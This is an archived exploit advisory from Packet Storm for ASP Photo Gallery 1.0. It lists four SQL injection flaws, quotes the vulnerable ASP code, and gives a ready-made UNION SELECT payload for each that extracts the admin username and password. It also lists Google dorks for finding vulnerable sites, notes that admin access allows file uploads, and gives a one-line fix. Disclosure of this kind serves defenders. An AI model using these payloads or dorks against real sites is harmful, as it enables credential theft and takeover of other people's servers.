exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

aspphotogal-sql.txt

aspphotogal-sql.txt
Posted Jan 12, 2008
Authored by Ruben Ventura Pina | Site trew.icenetx.net

ASP Photo Gallery version 1.0 suffers from multiple SQL injection vulnerabilities.

tags | exploit, vulnerability, sql injection, asp
SHA-256 | 99cafcd4834afae759e8fb46094ee5b4c62d41bdaf1da29044a4e8c0e6deb99c

aspphotogal-sql.txt

Change Mirror Download
######################################################################
#
# ASP Photo Gallery 1.0 - Multiple SQL Injection Vulnerabilities
#
# Date : 12-january-2008
# Risk : Medium
# Vendor URL : http://www.matteobinda.com/apg.php
# Google Dork : "download this free gallery at matteobinda.com"
# : allinurl: imgbig.asp?id=
#
# Found By : Ruben Ventura PiƱa (Trew)
# Contact Info : http://trew.icenetx.net
# trew.revolution@gmail.com
# ICEnetX Team - http://icenetx.net
#
######################################################################
#
# Greetings oh earthlings:
# Ayzax, BRIO, Gaper (All ICEnetX Team)
# and to all people who likes H.I.M, lol.
#
# "Maybe you can't break the system, but you can always hack it."
#
######################################################################
#
## Vulnerability ##
#
# "ASP Photo Gallery" is a free tool to create web galleries. It was
# written in ASP and uses an Access Database to store data.
# Input is not propperly santised, therefore the application has
# multiple SQL injection vulnerabilities.
#
# ---
# First bug:
# The following code in the Imgbig.asp file is vulnerable:
# <% ...
# nomefoto = request("Id")
# ...
# sql = "SELECT * FROM fotoinfo WHERE name='" & nomefoto & "'"
# objrs.Open sql, objConn ,3,3
# ... %>
#
# Input passed to the "Id" parameter is not santised. This can be
# exploited in the following manner to obtain the admin's password:
#
# http://[site]/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1
#
# ---
# Second bug:
# The following code in the thumbricerca.asp file is vulnerable:
# <% ...
# ricerca = Request.QueryString("id")
# ...
# sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%' order by name desc"
# objrs.Open sql, objConn ,3,3
# ... %>
#
# Input passed to the "id" parameter is not santised. This can be
# exploited in the following manner to obtain the admin's password:
#
# /thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like '%
#
# ---
# Third bug:
# The following code in the thumbricerca.asp file is vulnerable:
# <% ...
# ricerca = request.form("ricerca")
# ...
# sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%' order by name desc"
# objrs.Open sql, objConn ,3,3
# ... %>
#
# Input passed to the "ricerca" parameter is not santised. This can be
# exploited by inserting the following code into the search textfield
# located in the thumbricerca.asp file:
# -1'union select user as name,1,pass as descrizione from stuff where 1 like '%
# --
# Fourth bug:
# The following code in the thumb.asp file is vulnerable:
# <% ...
# intCodice = request("id")
# ...
# sql = "SELECT * from fotoinfo where category ='" & intcodice & "' order by name desc"
# objrs.Open sql, objConn ,3,3
# ..%>
#
# Input passed to the "id" parameter is not santised. This can be exploited
# in the following manner to obtain the admin's password:
#
# /thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1
#
#
# After an attacker has logged in into the admin panel (/admin/admin.asp), he'll have the
# possibility to upload files to the server.
#
#
## How to fix ##
#
# Santise all input which is then used in SQL queries.
#

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close